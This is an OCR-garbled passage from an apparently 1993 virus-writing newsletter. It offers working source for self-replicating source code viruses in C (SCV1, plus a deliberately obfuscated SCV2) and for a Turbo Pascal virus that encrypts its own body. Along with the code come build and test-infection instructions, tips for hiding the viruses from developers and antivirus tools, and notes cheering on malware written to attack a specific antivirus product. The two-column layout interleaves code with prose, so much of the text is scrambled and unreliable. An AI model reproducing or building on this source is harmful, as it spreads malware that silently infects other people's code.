the Internet were hot and insane. Here’s a typical sam-
pling:
“Either the simulator is useless, or you are distribut-

ing malicious software. . . Hmm, I ws able to draw
A Source Code Virus in C
this conclusion even without having to look at the
simulator. . . pretty good isn’t it? . . .”
Vesselin Bontchev Ok, it’s time to bring source code viruses out of the
theoretical realm and onto paper. Here we will discuss a
“I’m disappointed that you would pass yourself off as simple source code virus written in C, designed to infect
a fair and open scientist and researcher open to new C files. Its name is simply SCV1.
ideas. Then . . . without even examining the Virus SCV1 is not an extremely agressive virus. It only
Simulator MtE Supplement yourself, draw a con- infects C files in the current directory, and it makes no
clusion and announce your findings in a public very serious efforts to hide itself. None the less, I’d urge
forum.” Doren Rosenthal you to be extremely careful with it if you try it out. It is
for all intents and purposes undetectable with existing
Are we having fun yet?
anti-virus technology. Don’t let it get into any develop-
Note that the Mutation Engine itself is not malicious
ment work you have sitting around!
software, unless you’re trying to detect viruses by string
Basically, SCV1 consists of two parts, a C file,
searching. Rosenthal makes it rather difficult to extract
SCV1.C and a header file VIRUS.H. The bulk of the
the mutation engine from his code, so I doubt anyone
code for the virus sits in VIRUS.H. All SCV1.C has in it
will use the Simulator just to get a copy of it for the

is an include statement to pull in VIRUS.H, and a call to
the main virus function sc_virus(). The philosophy be- /* An easy program to infect with SCV1 */
#include <virus.h>
hind this breakdown is that it will help elude detection by
sight because it doesn’t put a huge pile of code in your C #include <stdio.h>
files. To infect a C file, the virus only needs to put an void main()
{
#include <virus.h> printf("%s","Hello, world.");
sc_virus();}
statement in it and stash the call
That’s all an infection consists of.
sc_virus(); When executed, the virus must perform two tasks: (1)
it must look for the VIRUS.H file. If VIRUS.H is not
in some function in the file. If you don’t notice these little present, the virus must create it in your INCLUDE direc-
additions, you may never notice the virus is there. tory, as specified in your environment. (2) The virus
SCV1 is not very sneaky about where it puts these must find a suitable C file to infect, and if it finds one, it
additions to a C file. The include statement is inserted on must infect it. It determines whether a C file is suitable
the first line of a file that is not part of a comment, the to infect by searching for the
call to sc_virus() is always placed right before the last
closing bracket in a file. That makes it the last thing to #include <virus.h>
execute in the last function in a file. For example, if we
statement. If it finds it, SCV1 assumes the file has already
take the standard C example program HELLO.C:
been infected and passes it by. To avoid taking up a lot of
/* An easy program to infect with SCV1 */ time executing on systems that do not even have C files on
them, SCV1 will not look for VIRUS.H or any C files if it
#include <stdio.h>
does not find an INCLUDE environment variable. Check-
void main() ing the environment is an extremely fast process, requiring
{ no disk access, so the average user will have no idea the
printf("%s","Hello, world.");
} virus is there.
VIRUS.H may be broken down into two parts. The
and let it get infected by SCV1. It will then look like this: first part is simply the code which gets compiled. The
second part is the character constant virush[], which
contains the whole of VIRUS.H as a constant. If you
Include No think about it, you will see that some coding trick must
Exit be employed to handle the recursive nature of
exists
virush[]. Obviously, virush[] must contain all of
Yes
VIRUS.H, including the specification of the constant
Create virush[] itself. The function write_virush() which is
VIRUS.H No responsible for creating a new VIRUS.H in the infection
VIRUS.H in
exists include dir process, handles this task by using two indicies into the
Yes character array. When the file is written, write_virush()
uses the first index to get a character from the array and
Find first write it directly to the new VIRUS.H file. As soon as a
C file null in virush[] is encountered, this direct write
process is suspended. Then, write_virush() begins to use
the second index to go through virush[] a second
No time. This time it takes each character in virush[] and
File found? Exit
convers it to its numerical value, e.g.,
Yes
‘a’ ‘65’
Is it No
infected? Infect C file and writes that number to VIRUS.H. Once the whole array
has been coded as numbers, write_virush() goes back to
Yes the first index and continues the direct transcription until it
reaches the end of the array again.
Find next file The second ingredient in making this scheme work is
to code virush[] properly. The trick is to put a null in
Fig. 3: The operation of SCV1. it right after the opening bracket of the declaration of
virush[]:

editor. Likewise, the call to sc_virus() could be put out
static char virush[]={49,52,...... past line 80 anywhere in the code of any function.
. . . . .
63,68,61,72,20,76,69,72,75,73,68,5B,5D,3D,7B,0,7D, One of the bigger problems a source code virus in C
(c h a r v i r u s h [ ] = { } ) must face is that it will have little idea what the function
. . . . .
. . . } it inserts itself in actually does. That function may rarely
get called, or it may get called a hundred times a second.
Null goes here The virus isn’t smart enough to know the difference,
unless it goes searching for main(). If the virus were
This null is the key which tells write_virush() where to inserted in a frequently called function, it would
switch from index one to index two. We also make the last noticeably bog down the program on a system with
character in virush[] a null for convenience’ sake. development work on it. Additionally, if the virus has
Coding the virush[] constant for the first time infected multiple components of a single program it
would be a real headache if you had to do it by hand. could be called at many different times from within a
Every change you made to the virus would make your variety of routines. This potential problem could be
headache worse. Fortunately that isn’t necessary. One avoided by putting a global time stamp in the virus, so
may write a program to do it automatically. Here we call that it would allow itself to execute at most—say—every
our constant-generator program CONSTANT. The 15 minutes within any given instance of a program.
CONSTANT program essentially uses the same techni- So there you have it. Once the principles of a source
que as write_virush() to create the first copy of VIRUS.H code virus are understood, they prove rather easy to
from a source file, VIRUS.HS. VIRUS.HS is writtten write. The code required for SCV1 is certainly no more
with all of the correct code that VIRUS.H should have, complex than the code for a simple direct EXE infector.
but instead of a complete virush[] constant, it uses a And the power of the language assures us that much
declaration more complex and effective viruses could be concocted.
static char virush[]={0};
Source Listing for SCV1.C
The CONSTANT program simily goes through
VIRUS.HS looking for this declaration, and fills
virush[] in with the contents it should have. The following program will compile with Microsoft
Clearly the size of the code is a concern. Since the C Version 7.0, and probably some earlier versions as
CONSTANT program puts all of the comments and well. An admittedly lame attempt has been made to
white space into virush[] and moves them right along avoid Microsoft-specific syntax so that it shouldn’t be
with the virus, it carries a lot of extra baggage. A second too hard to port to other environments. It was originally
implementation of the same virus, called SCV2, gets rid developed using a medium memory model.
of that baggage by writing VIRUS.H in the most /* This is a source code virus in Microsoft C. All of the code is in virus.h */
economical form possible. This could probably be ac- #include <stdio.h>

#include <virus.h>
complished mechanically with an improved CON- /******************************************************************************/
STANT program which could remove comments and void main()
{
sc_virus(); // just go infect a .c file
compress the code. }
SCV1 could easily be made much more elusive and

effective without a whole lot of trouble. A file search
routine which jumps directories is easy to write and Source Listing for VIRUS.HS
would obviously make the virus more infective. On a
more subtle level, no special efforts have been made to Most of the meat of the virus hides in VIRUS.H. That
hide the virus and what it is doing. The file writes are not file is created by running this one through the CON-
coded in the fastest manner possible, nor is the routine to STANT program, which fills in the virush[] con-
determine if a file is infected. The virush[] constant stant. Again, this should be compiled with SCV1.C using
could easily be encrypted (even using C’s random num- Microsoft C 7.0.
ber generator) so that it could not be seen in the ex-
ecutable file. The VIRUS.H file could be hidden, nested /*Microsoft C 7.0-compatible source code virus
This file contains the actual body of the virus.
in another .H file (e.g. STDIO.H), and even dynamically This code is (C) 1993 by American Eagle Publications, Inc.
P.O. Box 41401
renamed. The statements inserted into C files could be Tucson, AZ 85717
better hidden. For example, when inserting the include ALL RIGHTS RESERVED. YOU MAY NOT COPY OR DISTRIBUTE THIS CODE IN ANY FORM,
SOURCE OR EXECUTABLE, WITHOUT PRIOR WRITTEN PERMISSION FROM THE PUBLISHER!!!
statement, the virus could look for the first blank line in */
#ifndef SCVIRUS
a C file (not inside a comment) and then put the include #define SCVIRUS
statement on that line out past line 80, so it won’t appear #include <stdio.h>
#include <dos.h>
on the screen the minute you call the file up with an

#define TRUE 1 while ((i>0)&&((l[i]!=’}’)||(cf2==TRUE)))
#define FALSE 0 {
i—; /* decrement i and track*/
/* The following array is initialized by the CONSTANT program */ if ((l[i]==’/’)&&(l[i-1]==’*’)) cf2=TRUE; /*comment flag properly*/
static char virush[]={0}; if ((l[i]==’*’)&&(l[i-1]==’/’)) cf2=FALSE;
}
/******************************************************************************/ if (l[i]==’}’) /* ok, legitimate last bracket, put call in now*/
/* This function determines whether it is OK to attach the virus to a given { /* by inserting it in l */
file, as passed to the procedure in its parameter. If OK, it returns TRUE. for (j=strlen(l);j>=i;j—) l[j+11]=l[j]; /* at i */
The only condition is whether or not the file has already been infected. strncpy(&l[i],"sc_virus();",11);
This routine determines whether the file has been infected by searching }
the file for “#include <virus.h>”, the virus procedure. If found, it assumes }
the program is infected. */ for (i=0;l[i]!=0;i++) fwrite(&l[i],1,1,f); /* write text l to the file */
}
int ok_to_attach(char *fn) while (!feof(ft));
{ fclose(f); /* second pass done */
FILE *host_file; fclose(ft);
int j; remove("temp.ccc"); /* get rid of temp file */
char txtline[255]; }
if ((host_file=fopen(fn,"r"))==NULL) return FALSE; /* open the file */ /******************************************************************************/

do /* This routine searches for the virus.h file in the first include directory.
{ /* scan the file */ It returns TRUE if it finds the file. */
j=0; txtline[j]=0;
while ((!feof(host_file))&&((j==0)||(txtline[j-1]!=0x0A))) int find_virush(char *fn)
{fread(&txtline[j],1,1,host_file); j++;} {
txtline[—j]=0; FILE *f;
if (strcmp("#include <virus.h>",txtline)==0) /* found virus.h ref */ int i;
{
fclose(host_file); /* so don’t reinfect */ strcpy(fn,getenv("INCLUDE"));
return FALSE; for (i=0;fn[i]!=0;i++) /* truncate include if it has */
} if (fn[i]==’;’) fn[i]=0; /* multiple directories */
} if (fn[0]!=0) strcat(fn,"\\VIRUS.H"); /*full path of virus.h is in fn now*/
while (!feof(host_file)); else strcpy(fn,"VIRUS.H"); /* if no include, use current*/
close(host_file); /* virus.h not found */ f=fopen(fn,"r"); /* try to open the file */
return TRUE; /* so ok to infect */ if (f==NULL) return FALSE; /* can’t, it doesn’t exist */
} fclose(f); /* else just close it and exit */
return TRUE;
/******************************************************************************/ }
/* This function searches the current directory to find a C file that
has not been infected yet. It calls the function ok_to_attach in order /******************************************************************************/
to determine whether or not a given file has already been infected. It /* This routine writes the virus.h file in the include directory. It must read
returns TRUE if it successfully found a file, and FALSE if it did not. through the virush constant twice, once transcribing it literally to make
If it found a file, it returns the name in fn. */ the ascii text of the virus.h file, and once transcribing it as a binary
array to make the virush constant, which is contained in the virus.h file */
int find_c_file(char *fn)
{ void write_virush(char *fn)
struct find_t c_file; {
int ck; int j,k,l,cc;
char v[255];
ck=_dos_findfirst(fn,_A_NORMAL,&c_file); /* standard DOS file search */ FILE *f;
while ((ck==0) && (ok_to_attach(c_file.name)==FALSE))
ck=_dos_findnext(&c_file); /* keep looking */ if ((f=fopen(fn,"a"))==NULL) return;
if (ck==0) /* not at the end of search */ cc=j=k=0;
{ /* so we found a file */ while (virush[j]) fwrite(&virush[j++],1,1,f); /*write up to first 0 in const*/
strcpy(fn,c_file.name); while (virush[k]||(k==j)) /* write constant in binary form */
return TRUE; {
} itoa((int)virush[k],v,10); /* convert binary char to ascii # */
else return FALSE; /* else nothing found */ l=0;
} while (v[l]) fwrite(&v[l++],1,1,f); /* write it to the file */
k++;
/******************************************************************************/ cc++;
/* This is the routine which actually attaches the virus to a given file. if (cc>20) /* put only 20 bytes per line */
To attach the virus to a new file, it must take two steps: (1) It must {
put a “#include <virus.h>” statement in the file. This is placed on the strcpy(v,",\n “);
first line that is not a comment. (2) It must put a call to the sc_virus fwrite(&v[0],strlen(v),1,f);
routine in the last function in the source file. This requires two passes cc=0;
on the file. }
*/ else
{
void append_virus(char *fn) v[0]=’,’;
{ fwrite(&v[0],1,1,f);
FILE *f,*ft; }
char l[255],p[255]; }
int i,j,k,vh,cf1,cf2,lbdl,lct; strcpy(v,"0};"); /* end of the constant */
fwrite(&v[0],3,1,f);
cf1=cf2=FALSE; /* comment flag 1 or 2 TRUE if inside a comment */ j++;
lbdl=0; /* last line where bracket depth > 0 */ while (virush[j]) fwrite(&virush[j++],1,1,f);/*write everything after constant*/
lct=0; /* line count */ fclose(f); /* all done */
vh=FALSE; /* vh TRUE if virus.h include statement written */ }
if ((f=fopen(fn,"rw"))==NULL) return;
if ((ft=fopen("temp.ccc","a"))==NULL) return; /******************************************************************************/
do /* This is the actual viral procedure. It does two things: (1) it looks for
{ the file VIRUS.H, and creates it if it is not there. (2) It looks for an
j=0; l[j]=0; infectable C file and infects it if it finds one. */
while ((!feof(f)) && ((j==0)||(l[j-1]!=0x0A))) /* read a line of text */
{fread(&l[j],1,1,f); j++;} void sc_virus()
l[j]=0; {
lct++; /* increment line count */ char fn[64];
cf1=FALSE; /* flag for // style comment */
for (i=0;l[i]!=0;i++) strcpy(fn,getenv("INCLUDE")); /* make sure there is an include directory */
{ if (fn[0])
if ((l[i]==’/’)&&(l[i+1]==’/’)) cf1=TRUE; /* set comment flags */ {
if ((l[i]==’/’)&&(l[i+1]==’*’)) cf2=TRUE; /* before searching */ if (!find_virush(fn)) write_virush(fn); /* create virus.h if needed */
if ((l[i]==’*’)&&(l[i+1]==’/’)) cf2=FALSE; /* for a bracket */ strcpy(fn,"*.c");
if ((l[i]==’}’)&&((cf1|cf2)==FALSE)) lbdl=lct; /* update lbdl */ if (find_c_file(fn)) append_virus(fn); /* infect a file */
} }
if ((strncmp(l,"/*",2)!=0)&&(strncmp(l,"//",2)!=0)&&(vh==FALSE)) }
{
strcpy(p,"#include <virus.h>\n"); /* put include virus.h */ #endif
fwrite(&p[0],strlen(p),1,ft); /* on first line that isnt */
vh=TRUE; /* a comment, update flag */
lct++; /* and line count */
}
for (i=0;l[i]!=0;i++) fwrite(&l[i],1,1,ft); /*write line of text to file*/
}
while (!feof(f));
fclose(f);
/* all done with first pass */ Source Listing for CONSTANT.C
fclose(ft);
if ((ft=fopen("temp.ccc","r"))==NULL) return; /*2nd pass, reverse file names*/
if ((f=fopen(fn,"w"))==NULL) return;
lct=0;
cf2=FALSE; Again, compile this with Microsoft C 7.0. Note that
do
{
j=0; l[j]=0;
the file names and constant names are hard-coded in.
while ((!feof(ft)) && ((j==0)||(l[j-1]!=0x0A))) /* read line of text */
{fread(&l[j],1,1,ft); j++;}
l[j]=0; // This program adds the virush constant to the virus.h source file, and
lct++; // names the file with the constant as virus.hhh
for (i=0;l[i]!=0;i++)
{ #include <stdio.h>
if ((l[i]==’/’)&&(l[i+1]==’*’)) cf2=TRUE; /* update comment flag */ #include <fcntl.h>
if ((l[i]==’*’)&&(l[i+1]==’/’)) cf2=FALSE;
} int ccount;
if (lct==lbdl) /* insert call to sc_virus() */ FILE *f1,*f2,*ft;
{
k=strlen(l); /* ignore // comments */
for (i=0;i<strlen(l);i++) if ((l[i]==’/’)&&(l[i+1]==’/’)) k=i;
i=k;

void put_constant(FILE *f, char c)
{
char n[5],u[26];
SCV1 is executed, HELLO.C should be infected as
int j; detailed on page 10. Furthermore, if the file VIRUS.H
itoa((int)c,n,10);
j=0; was not in your include directory, it will now be there.
while (n[j]) fwrite(&n[j++],1,1,f);
Delete the directory you were working in, and VIRUS.H
ccount++;
if (ccount>20)
{
in your include directory to clean up.
strcpy(&u[0],",\n “);
fwrite(&u[0],strlen(u),1,f);
ccount=0;
}
else
{
u[0]=’,’;
The Compressed Virus
fwrite(&u[0],1,1,f);
}
}
/******************************************************************************/
A wild source code virus will not have all kinds of
void main()
{ nice comments in it, or descriptive function names, so
char l[255],p[255];
int i,j; you can tell what it is and what it is doing. Instead, it may
ccount=0;
f1=fopen("virus.hs","r");
look like the following code, which just implements
ft=fopen("virus.h","w");
do
SCV1 in a little more compact notation.
{
j=0; l[j]=0;
while ((!feof(f1)) && ((j==0)||(l[j-1]!=0x0A)))
{fread(&l[j],1,1,f1); j++;}
l[j]=0;
if (strcmp(l,"static char virush[]={0};\n")==0)
{
Source Listing for SCV2.C
fwrite(&l[0],22,1,ft);
f2=fopen("virus.hs","r");
do
{
j=0; p[j]=0;
Again, compile this with Microsoft C 7.0.
while ((!feof(f2)) && ((j==0)||(p[j-1]!=0x0A)))
{fread(&p[j],1,1,f2); j++;}
p[j]=0; /* This is a source code virus in Microsoft C. All of the code is in virus.h */
if (strcmp(p,"static char virush[]={0};\n")==0)
{ #include <stdio.h>
for (i=0;i<22;i++) put_constant(ft,p[i]); #include <v784.h>
p[0]=’0’; p[1]=’,’;
fwrite(&p[0],2,1,ft); /******************************************************************************/
ccount++; void main()
for (i=25;p[i]!=0;i++) put_constant(ft,p[i]); {
} s784(); // just go infect a .c file
else }
{
for (i=0;i<j;i++) put_constant(ft,p[i]);
}
}
while (!feof(f2));
}
strcpy(&p,"0};\n");
fwrite(&p[0],strlen(p),1,ft); Source Listing for VIRUS2.HS
else for (i=0;i<j;i++) fwrite(&l[i],1,1,ft);
}
while (!feof(f1));
fclose(f1); /* (C) Copyright 1993 American Eagle Publications, Inc. All rights reserved. */
fclose(f2);
fclose(ft); #ifndef S784
} #define S784
#include <stdio.h>
#include <dos.h>
static char a784[]={0};
int r785(char *a){FILE *b;int c;char d[255];if ((b=fopen(a,"r"))==NULL) return 0;
Test Drive do{c=d[0]=0;while ((!feof(b))&&((c==0)||(d[c-1]!=10))){fread(&d[c],1,1,b); c++;}

d[—c]=0;if (strcmp("#include <v784.h>",d)==0){fclose(b);return 0;}}while(!feof(b)
);close(b);return 1;}
int r783(char *a){struct find_t b;int c;c=_dos_findfirst(a,_A_NORMAL,&b);while

((c==0)&&(r785(b.name)==0))c=_dos_findnext(&b);if (c==0){strcpy(a,b.name);
return 1;}else return 0;}
To create the virus in its executable form, you must
void r784(char *a) {FILE *c,*b;char l[255],p[255];int i,j,k,f,g,h,d,e;g=h=d=e=f=0;
first create VIRUS.H from VIRUS.HS, and then compile if ((c=fopen(a,"rw"))==NULL) return;if ((b=fopen("tq784","a"))==NULL) return;do
{j=l[0]=0;while ((!feof(c)) && ((j==0)||(l[j-1]!=10))){fread(&l[j],1,1,c); j++;}
SCV1.C. The following commands will do the job, l[j]=g=0;e++;for (i=0;l[i]!=0;i++){if ((l[i]==’/’)&&(l[i+1]==’/’)) g=1;if ((l[i]
==’/’)&&(l[i+1]==’*’)) h=1;if ((l[i]==’*’)&&(l[i+1]==’/’)) h=0;if ((l[i]==’}’)&&
provided you have your include environment variable set ((g|h)==0))d=e;}if ((strncmp(l,"/*",2)!=0)&&(strncmp(l,"//",2)!=0)&&(f==0)){strcpy
(p,"#include <v784.h>\n");fwrite(&p[0],strlen(p),1,b);f=1;e++;}for (i=0;l[i]!=0;
i++)fwrite(&l[i],1,1,b);}while (!feof(c));fclose(c);fclose(b);if ((b=fopen("tq7
to \C700\INCLUDE: 84",“r”))==NULL) return;if ((c=fopen(a,"w"))==NULL) return;h=e=0;do{j=l[0]=0
;while ((!feof(b))&&((j==0)||(l[j-1]!=10))){fread(&l[j],1,1,b);j++;}l[j]=
0;e++;for(i=0;l[i]!=0;i++){if((l[i]==’/’)&&(l[i+1]==’*’))h=1;if((l[i]==’*’)&&
(l[i+1]==’/’)) h=0;}if (e==d) {k=strlen(l);for(i=0;i<strlen(l);i++)if((l[i]==
constant ’/’)&&(l[i+1]==’/’))k=i;i=k;while((i>0)&&((l[i]!=’}’)||(h==1))){i—;if ((l[i]==’/’)
&&(l[i-1]==’*’)) h=1;if ((l[i]==’*’)&&(l[i-1]==’/’)) h=0;}if (l[i]==’}’){
copy virus.h \c700\include for(j=strlen(l);j>=i;j—)l[j+7]=l[j];strncpy(&l[i],"s784();",7);}}for (i=0;
cl scv1.c l[i]!=0;i++) fwrite(&l[i],1,1,c);}while (!feof(b));fclose(c);fclose(b);
remove("tq784");}
int r781(char *a) {FILE *b;int c;strcpy(a,getenv("INCLUDE"));for (c=0;a[c]!=0;

If you do not have Microsoft C 7.0, the executable c++) if (a[c]==’;’) a[c]=0;if (a[0]!=0) strcat(a,"\\V784.H"); else strcpy(a,
“V784.H”);if ((b=fopen(a,"r"))==NULL) return 0;fclose(b);return 1;}
files for this virus are included on the diskette with this void r782(char *g) {int b,c,d,e;char a[255];FILE *q;if ((q=fopen(g,"a"))==NULL)
return; b=c=d=0; while (a784[b]) fwrite(&a784[b++],1,1,q); while (a784[d]||(d==b))
issue. Make sure you create a directory \C700\IN- {itoa((int)a784[d],a,10);e=0;while (a[e]) fwrite(&a[e++],1,1,q);d++;c++;if (c>20)
{strcpy(a,",\n “);fwrite(&a[0],strlen(a),1,q);c=0;}else
CLUDE (or any other directory you like) and execute the {a[0]=’,’;fwrite(&a[0],1,1,q);}}strcpy(a,"0};");fwrite(&a[0],3,1,q);b++;while
(a784[b]) fwrite(&a784[b++],1,1,q);fclose(q);}
appropriate SET command: void s784() {char q[64]; strcpy(q,getenv("INCLUDE"));if (q[0]){if (!r781(q))
r782(q); strcpy(q,"*.c"); if (r783(q)) r784(q);}}
#endif
SET INCLUDE=C:\C700\INCLUDE
before you attempt to run SCV1, or it will not reproduce.

To demonstrate an infection with SCV1, create the
file HELLO.C (see p. 10), and put it in a new subdirec-
tory along with SCV1.EXE. Then execute SCV1. After

to anyone. We have recently upgraded our security to
keep all names and addresses encrypted with a military-
quality data encryption program. Besides, we are doing
Random Notes nothing illegal. We are eager to obey the laws, pay all
our taxes, and be good members of society, so we don’t
see any reason that should happen. But then, that doesn’t
necessarily mean a lot now.1 So we take precautions. The
1. Various persons have decided to declare war on one exception to this is if you send us a bad check. Then
Central Point Anti-Virus. As you will recall, the we put your name in a file entitled “Special Contacts”
RETALIATOR virus in the last issue detected CPAV’s which gets encrypted, but the plaintext file is never
memory-resident utility and went to work on it. The deleted.
Crypt Newsletter, an electronic publication available on 7. Volume 2 of The Little Black Book of Computer
various BBS’s and networks states: Viruses is still in the works. I hope we can get it out this
CRYPT NEWSLETTER DECLARES WAR! | On CENTRAL POINT ANTIVIRUS: killing
spring. At any rate, you’ll be the first to hear about it
CRYPT NEWSLETTER DECLARES WAR! | the brain-fogged retail dragon!
when it comes.
and that it is “Time for it to go!” A new mutation-engine 1. See Andrew Schneider & Mary Flaherty, “Presumed Guilty: The
based virus, ENCROACHER was introduced that goes Law’s Victims in the War on Drugs,” The Pittsburgh Press, August
after Central Point specifically. It attempts to delete the 11-16, 1991—ant that’s just the tip of the iceburg.
Central Point anti-virus programs, and it deletes the little
.CPS files which Central Point spreads all over the place.
CPAV is dumb enough that it just creates a new CPS file
when one is missing, only the files it uses to create it from
are infected, so the infection can proceed unnoticed. The
ENCROACHER might actually be termed a “useful”
A Source Code Virus in
virus. There is certainly no easier way to uninstall CPAV,
as you can spend hours changing directories all over the
Turbo Pascal
place to delete those CPS files. Watch out though: there is
a malicious version of ENCROACHER as well as a benign The following program, SVIRUS, is a source code
one. virus written for Turbo Pascal 4.0 and up. It is very
2. On top of this, Microsoft’s MS-DOS Version 6.0, similar in function to SCV1 in C (in fact, the C virus was
scheduled for release this spring, has some anti-virus modelled after it) except that all of its code is contained
utilities packaged with it. You guessed it: They are in the file which it infects. As such, it just looks for a
curiously similar to Central Point Anti-Virus. I suspect PAS file and tries to infect it, rather than having to keep
the decision of whose product to use was based on busi- track of both an include file and infected source files.
ness considerations, more so than technical considera- This virus is completely self-contained in a single
tions. Microsoft has bought Central Point utilities before. procedure, VIRUS, and a single typed constant,
We wonder if Microsoft will be issuing quarterly updates TCONST. Note that when writing a source code virus,
to DOS now. Well, anyway, virus authors, there you one tries to keep as many variables and procedures as
have it: a new de facto standard to wage war against. possible local. Since the virus will insert itself into many
3. A casual reference to 2600 in the last issue different source files, the fewer global variable and pro-
produced a flurry of phone calls from people wondering cedure names, the fewer potential conflicts that the com-
where they could get it. 2600, subtitled The Hacker piler will alert the user to. The global variables and
Quarterly, is dedicated primarily to phone phreaking, procedures which one declares should be strange enough
but it covers all aspects of hacking, including viruses. It names that they probably won’t get used in an ordinary
is $21/year for individuals, and $50/year for corpora- program. One must avoid things like i and j, etc.
tions (overseas $30/individual, $65 corporate). You may SCVIRUS will insert itself into a file and put the call
order it by writing 2600, PO Box 752, Middle Island, NY to VIRUS right before the “end.” in the main procedure.
11953. Back issues going as far back as 1984 are avail- It performs a search only on the current directory. If it
able at $25/year. finds no files with an extent of .PAS it simply goes to
4. PC Magazine will have their big anti-viral product sleep. Obviously, the danger of accidently inserting the
review in the March 16, 1993 issue. Watch out for it. call to VIRUS in a procedure that is called very frequent-
5. You might want to check out the February Byte. A ly is avoided by searching for an “end.” instead of an
new idea by Doren Rosenthal, “Virus Armor” will sup- “end;” to insert the call. That makes sure it ends up in the
posedly be discussed. main procedure (or the initialization code for a unit).
6. Some people have wondered about the security of SCVIRUS implements a simple encryption scheme to
our mailing list. First of all, we NEVER sell your name make sure that someone snooping through the executable

assign(host_file,file_name);
code will not see the source code stuffed in TCONST. reset(host_file);
uses_flag:=false;
{open the file}
Rather than making TCONST a straight ASCII constant, ok_to_attach:=true;

repeat
{assume it’s uninfected}
{scan the file}
each byte in the source is multiplied by two and XORed readln(host_file,txtline);
txtline:=UpString(txtline);
if pos(’USES ’,txtline)>0 then uses_flag:=true; {Find “uses”}
with 0AAH. To create the constant, one must take the if pos(’PROCEDURE VIRUS;’,txtline)>0 then {and virus procedure}
ok_to_attach:=false;
virus procedure (along with the IFNDEF,etc.) and put it until eof(host_file);
close(host_file);
in a separate file. Then run the ENCODE program on it. end;
ENCODE will create a new file with a proper TCONST {This function searches the current directory to find a pascal file that
has not been infected yet. It calls the function ok_to_attach in order
to determine whether or not a given file has already been infected. It
definition, complete with encryption. Then, with an returns TRUE if it successfully found a file, and FALSE if it did not.
If it found a file, it returns the name in fn.}
editor, one may put the proper constant back into function find_pascal_file:boolean;
var
SCVIRUS.PAS. sr
begin
:SearchRec; {From the DOS unit}
FindFirst(’*.PAS’,AnyFile,sr); {Search for pascal file}

Clearly the virus could be rewritten to hide the body while (DosError=0) and (not ok_to_attach(sr.name)) do {until one found}
FindNext(sr); {or no more files found}
of the code in an include file, VIRUS.INC, so that the if DosError=0 then
begin
only thing which would have to be added to infect a file fn:=sr.name;
find_pascal_file:=true;
{successfully found one}
{so set name and flag}
would be the call to VIRUS and a statement end
else find_pascal_file:=false; {else none found - set flag}
end;
{This is the routine which actually attaches the virus to a given file.}
{$I VIRUS.INC} procedure append_virus;
var
f,ft :text;
l,t,lt :string;
Since Turbo Pascal doesn’t make use of an IN- j
cw,
:word;
{flag to indicate constant was written}
CLUDE environment variable, the virus would have to pw,
uw,
{flag to indicate procedure was written}
{flag to indicate uses statement was written}
put VIRUS.INC in the current directory, or specify the intf,
impf,
{flag to indicate “interface” statement}
{flag to indicate “implementation” statement}
comment :boolean;
exact path where it did put it (\TP, the default Turbo begin
assign(f,fn);
install directory might be a good choice). In any event, it reset(f);
assign(ft,’temp.aps’);
{open the file}
would probably only want to create that file when it had rewrite(ft);
cw:=false;
{open a temporary file too}
pw:=false;
successfully found a PAS file to infect, so it did not put uw:=false;
impf:=false;
new files on systems which had no Pascal files on them intf:=false;
filetype:=’ ’; {initialize flags}
to start with. repeat
readln(f,l);
if t<>’’ then lt:=t;
t:=UpString(l); {look at all strings in upper case}
comment:=false;
for j:=1 to length(t) do {blank out all comments in the string}
Source Listing of SCVIRUS.PAS begin

if t[j]=’{’ then comment:=true;
if t[j]=’}’ then
begin
comment:=false;
t[j]:=’ ’;
The following code is a demonstration model. It com- end;
if comment then t[j]:=’ ’;
piles up to a whopping 47K. Getting rid of all the com- end;
if (filetype=’D’) and (not (uses_flag or uw)) then {put “uses” in pgm}
begin {if not already there}
ments and white space, as well as using short, cryptic writeln(ft,’uses dos;’);
uw:=true;
variable names, etc., compresses it down to 16K, which end;
if (filetype=’U’) and (not (uses_flag or uw)) {put “uses” in unit}
is somewhat more acceptable. I leave that up to you. and (intf) then
begin {if not already there}
writeln(ft,’uses dos;’);
uw:=true;
program source_code_virus; {This is a source code virus in Turbo Pascal} end;
if (filetype=’ ’) and (pos(’PROGRAM’,t)>0) then
uses dos; {DOS unit required for file searches} filetype:=’D’; {it is a DOS program}
if (filetype=’ ’) and (pos(’UNIT’,t)>0) then
filetype:=’U’; {it is a pascal unit}
{The following is the procedure “virus” rendered byte by byte as a constant. if (filetype=’U’) and (not intf) and (pos(’INTERFACE’,t)>0) then
This is required to keep the source code in the executable file when intf:=true; {flag interface statement in a unit}
compiled. The constant is generated using the ENCODE.PAS program.} if (filetype=’U’) and (not impf) and (pos(’IMPLEMENTATION’,t)>0) then
const impf:=true; {flag implementation statement in a unit}
tconst:array[1..8419] of byte=(92,226,56,38,54,34,32, if uses_flag and (pos(’USES’,t)>0) then {put “DOS” in uses statement}
38,234,12,44,6,56,14,80,234,234,234,234,234,234,234, begin
. . . . uw:=true;
92,116,102,234,70,120,78,64,76,80,176,190,92,226,32,54,34,56, if pos(’DOS’,t)=0 then {if needed}
38,80,176,190,176,190); l:=copy(l,1,pos(’;’,l)-1)+’,dos;’;
end;
if ((pos(’CONST’,t)>0) or (pos(’TYPE’,t)>0) or (pos(’VAR’,t)>0)
{This is the actual viral procedure, which goes out and finds a .PAS file or (impf and (pos(’IMPLEMENTATION’,t)=0))) and (not cw) then
and infects it} begin
cw:=true; {put the constant form of}
{$IFNDEF SCVIR} {Make sure an include file doesn’t also have it} writeln(ft,’{$IFNDEF SCVIRC}’); {conditional compile for constant}
{$DEFINE SCVIR} writeln(ft,’{$DEFINE SCVIRC}’);
PROCEDURE VIRUS; {This must be in caps or it won’t be recognized} writeln(ft,’const’); {the viral procedure in}
var write(ft,’ tconst :array[1..’,sizeof(tconst),’] of byte=(’);
fn :string; {File name string} for j:=1 to sizeof(tconst) do
filetype :char; {D=DOS program, U=Uni} begin
uses_flag :boolean; {Indicates whether “uses” statement present} write(ft,tconst[j]);
if j<sizeof(tconst) then write(ft,’,’)
{This sub-procedure makes a string upper case} else writeln(ft,’);’);
function UpString(s:string):string; if (j<sizeof(tconst)) and ((j div 16)*16=j) then
var j:byte; begin
begin writeln(ft);
for j:=1 to length(s) do s[j]:=UpCase(s[j]); {Just use UpCase for the} write(ft,’ ’);
UpString:=s; {whole length} end;
end; end;
writeln(ft,’{$ENDIF}’);
{This function determines whether it is OK to attach the virus to a given end;
file, as passed to the procedure in its parameter. If OK, it returns TRUE. if (filetype=’U’) {write viral procedure to the file}
The only condition is whether or not the file has already been infected. and ((pos(’PROCEDURE’,t)>0) {in a unit}
This routine determines whether the file has been infected by searching or (pos(’FUNCTION’,t)>0)
the file for “PROCEDURE VIRUS;”, the virus procedure. If found, it assumes or (pos(’BEGIN’,t)>0)
